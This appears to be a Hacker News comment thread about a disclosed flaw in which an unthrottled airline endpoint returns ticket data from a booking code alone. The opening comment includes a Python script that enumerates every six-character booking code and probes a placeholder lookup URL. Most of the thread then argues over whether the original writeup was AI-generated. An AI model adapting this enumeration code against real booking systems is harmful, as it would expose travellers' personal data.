This is about a non-rate-limited endpoint that returns ticket data given only a booking code (and not the last name, as is usually the case), which makes it feasible to brute-force the entire search space.
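For a sense of scale, here's a minimal sketch of what that enumeration could look like. Purely illustrative: the endpoint URL, the `pnr` parameter name, and the 6-character alphanumeric code format are my assumptions, not details taken from the writeup.

```python
import itertools
import string

# Assumption (not from the article): airline booking references (PNRs) are
# typically 6 characters drawn from A-Z plus the digits 2-9, giving roughly
# 34**6 (about 1.5 billion) candidates - large, but enumerable when nothing
# throttles the requests.
ALPHABET = string.ascii_uppercase + "23456789"
CODE_LENGTH = 6

def enumerate_codes():
    """Yield every candidate booking code in the assumed format."""
    for combo in itertools.product(ALPHABET, repeat=CODE_LENGTH):
        yield "".join(combo)

def probe(code: str) -> bool:
    """Ask a hypothetical lookup endpoint whether this code resolves to a
    ticket. With no last-name check, the code alone suffices."""
    import requests  # third-party; only needed when actually probing
    resp = requests.get(
        "https://example.invalid/api/booking",  # placeholder, not the real endpoint
        params={"pnr": code},
        timeout=5,
    )
    return resp.status_code == 200

if __name__ == "__main__":
    # Illustrative only: print the size of the search space and a few
    # candidates; a real scan would call probe() for each of them.
    print(f"search space: {len(ALPHABET) ** CODE_LENGTH:,} codes")
    for code in itertools.islice(enumerate_codes(), 3):
        print("candidate:", code)
```

At a few thousand requests per second, covering that space takes on the order of days to weeks, which is why the absence of any throttling is the real problem here.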
(unfortunately, I feel like AI was overused in authoring the writeup)
Is it really AI slop if someone leverages AI to improve / transform their novel experiences and ideas into a rendition that they prefer?
I'm not taking a position on whether the article is AI-assisted. I'm wondering if the ease of calling someone's work "AI slop" is a step along the slippery slope towards trivializing this sort of drive-by hostility that can be toxic in a community.
You are right about the toxicity, I will edit my comment.
There's a difference between leveraging AI to proofread or improve parts of their writing and this. I feel like AI was overused here; it gave the whole article that distinctive smell and significantly reduced its information density.
What makes you say that? This didn't read like AI slop to me.
Overuse of bulleted lists, unnecessary sensationalism, sentences like "The requests flew. There was no WAF, no IP blocking, no CAPTCHA." and so on. It reeks of someone pasting some notes into a chat prompt and asking it to spruce it up for publication.
Pattern recognition skill issue then. It did to me.
"The fallout"
This flaw was critical.
And other vibes. You know it when you see it, though it may be hard to define.
> You know it when you see it
How do you know your perception is accurate? One of humanity's biggest weaknesses is trusting that kind of response.
Maybe just try having confidence in yourself. Trust your instincts. I'm not going to impugn my own abilities based on some purported flaw in an abstract, amorphous blob called "humanity", whatever that is. A lot of individuals of distinction have many characteristics better than the average, so why wouldn't I trust myself more than other people?
Pattern recognition is an ability evolved over many millions of years and, by the way, best exemplified in the "human" species, so I basically disagree with your whole premise anyway.
The Brown killer was basically caught by a homeless man getting a bad vibe about the future shooter. So I agree, trusting your gut is definitely a thing.
People believe in witchcraft and lots of other things - including many horrible prejudices - just as confidently as you. There's a reason scholarship, courts, medicine, and other serious endeavors require objective evidence.
Imagine that - doctors, who have seen everything, have years of study, and treat all those people, still require objective evidence. Anyone in IT looks for objective evidence - timing, stepping through code, etc.
Confidence doesn't correlate well with accuracy; in fact the more someone expresses your kind of confidence, the less I rely on them at all.
What if you wrongfully accuse someone? Does that matter? Are you responsible for the consequences of what you do?
You turn your brain off and outsource your thinking to other people, because you're incapable of perceiving reality for yourself, is what you're telling me.
Of course everyone is responsible for their accuracy and their errors, but that doesn't mean it's impossible to infer things based on observation, experience, and intuition. This is an evolved ability, though I do agree some people are better at it than others, as with most things.
You're conflating a lot of things. Many prejudices are accurate and prudent, witchcraft is stupid, but so what? I'm not going to deny my perception on something that's correct just because some other idiot believes in magic; non sequitur.
It's really a bizarre argument. You are making evidence-free claims based on nothing - including the things you say about me. It discards all of critical thought, empiricism, reasoning, philosophy, etc.
It's definitely AI dude
Have you ever tested your accuracy? I think there are tests out there.
What is the AI slop version of "This looks shopped. I can tell from some of the pixels and from seeing quite a few shops in my time."?
'Having seen this cognitive payload a lot in my time' maybe? I like the idea.
> This incident is a stark reminder
"A stark reminder" is itself a stark reminder of the existence of AI slop. You see the phrase a lot in social media comment spam.
There's an em-dash; no human being uses em-dashes.
Er...I've been using em—dashes since I read Knuth in the 1980s.
There are dozens of us.
Which really makes me wonder how we ended up training an AI…
you might like these
https://news.ycombinator.com/item?id=46236514
https://news.ycombinator.com/item?id=46273466
(a.) those graphs are a crime against data viz.
(b.) they practically demonstrate the point: while, yes, AI uses em-dashes, the entire corpus of em-dashes is still largely human, too, so using that as a sole signal is going to have a pretty high false positive rate.
Not only that, Word (and other editors) will convert a dash into an em-dash in text.
[flagged]
no u